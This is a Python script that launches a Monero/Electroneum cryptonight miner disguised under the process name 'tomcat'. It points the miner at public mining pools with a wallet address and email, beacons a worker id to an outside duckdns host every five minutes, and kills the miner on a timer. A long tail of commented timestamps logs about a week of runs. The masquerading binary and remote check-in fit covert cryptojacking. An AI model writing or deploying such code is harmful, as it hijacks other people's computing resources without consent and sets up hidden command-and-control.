import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:05.805378
#2018-02-17 17:31:07.163620
#2018-02-17 19:19:04.045538
#2018-02-17 21:09:01.630087
#2018-02-17 22:52:07.279781
#2018-02-18 00:37:04.078720
#2018-02-18 02:27:07.226554
#2018-02-18 04:14:01.469208
#2018-02-18 06:04:07.356664
#2018-02-18 07:55:05.642969
#2018-02-18 09:42:05.215025
#2018-02-18 11:28:03.369159
#2018-02-18 13:14:06.851292
#2018-02-18 15:04:07.436577
#2018-02-18 16:52:05.696239
#2018-02-18 18:41:03.993413
#2018-02-18 20:28:04.984100
#2018-02-18 22:14:01.724844
#2018-02-19 00:02:06.452332
#2018-02-19 01:47:03.948798
#2018-02-19 03:36:04.084018
#2018-02-19 05:21:01.578825
#2018-02-19 07:07:05.327881
#2018-02-19 08:56:04.090523
#2018-02-19 10:46:04.739820
#2018-02-19 12:35:05.203649
#2018-02-19 14:22:08.208211
#2018-02-19 16:09:04.967430
#2018-02-19 17:56:05.178051
#2018-02-19 19:43:01.336252
#2018-02-19 21:30:10.195024
#2018-02-19 23:16:05.162657
#2018-02-20 01:02:03.649018
#2018-02-20 02:52:08.060195
#2018-02-20 04:41:06.474909
#2018-02-20 06:25:03.245041
#2018-02-20 08:09:07.286596
#2018-02-20 09:55:08.591344
#2018-02-20 11:40:08.792224
#2018-02-20 13:27:08.319573
#2018-02-20 15:12:07.849356
#2018-02-20 17:01:12.962391
#2018-02-20 18:49:01.825943
#2018-02-20 20:35:01.787542
#2018-02-20 22:19:05.889456
#2018-02-21 00:00:10.811607
#2018-02-21 01:45:04.409935
#2018-02-21 03:33:08.120741
#2018-02-21 05:22:01.543917
#2018-02-21 07:10:07.194948
#2018-02-21 08:55:08.764737
#2018-02-21 10:43:05.752459
#2018-02-21 12:31:10.493653
#2018-02-21 14:17:08.908622
#2018-02-21 16:04:06.769426
#2018-02-21 17:54:08.358461
#2018-02-21 19:41:06.719111
#2018-02-21 21:29:05.331248
#2018-02-21 23:15:10.605008
#2018-02-22 01:04:07.526734
#2018-02-22 02:52:07.160477
#2018-02-22 04:39:04.920107
#2018-02-22 06:23:07.711713
#2018-02-22 08:10:06.205765
#2018-02-22 09:57:06.159392
#2018-02-22 11:42:06.464206
#2018-02-22 13:28:01.710520
#2018-02-22 15:16:09.034341
#2018-02-22 17:01:10.096936
#2018-02-22 18:48:08.097528
#2018-02-22 20:41:04.796131
#2018-02-22 22:28:01.567584
#2018-02-23 00:13:06.853782
#2018-02-23 02:00:09.558699
#2018-02-23 03:48:01.384843
#2018-02-23 05:32:01.533612
#2018-02-23 07:18:04.118846
#2018-02-23 09:22:05.542194
#2018-02-23 11:28:01.655948
#2018-02-23 13:19:03.743900
#2018-02-23 15:05:01.579867
#2018-02-23 16:55:10.486863
#2018-02-23 18:44:04.486716
#2018-02-23 20:31:03.636125
#2018-02-23 22:18:04.864725
#2018-02-24 00:05:05.518729
#2018-02-24 01:54:03.836711
#2018-02-24 03:46:04.102757
#2018-02-24 05:33:01.419224
#2018-02-24 07:19:05.072855
#2018-02-24 09:09:03.605715
#2018-02-24 10:41:08.163802
#2018-02-24 11:05:03.824815
#2018-02-24 12:39:01.475421
#2018-02-24 14:16:07.848198
#2018-02-24 15:49:05.493667
#2018-02-24 17:24:06.425101
#2018-02-24 18:58:04.859521
#2018-02-24 20:28:06.241058
#2018-02-24 21:57:05.993734
#2018-02-25 00:42:02.037470
#2018-02-25 02:42:06.085766
#2018-02-25 06:22:06.889324
#2018-02-25 11:39:05.404122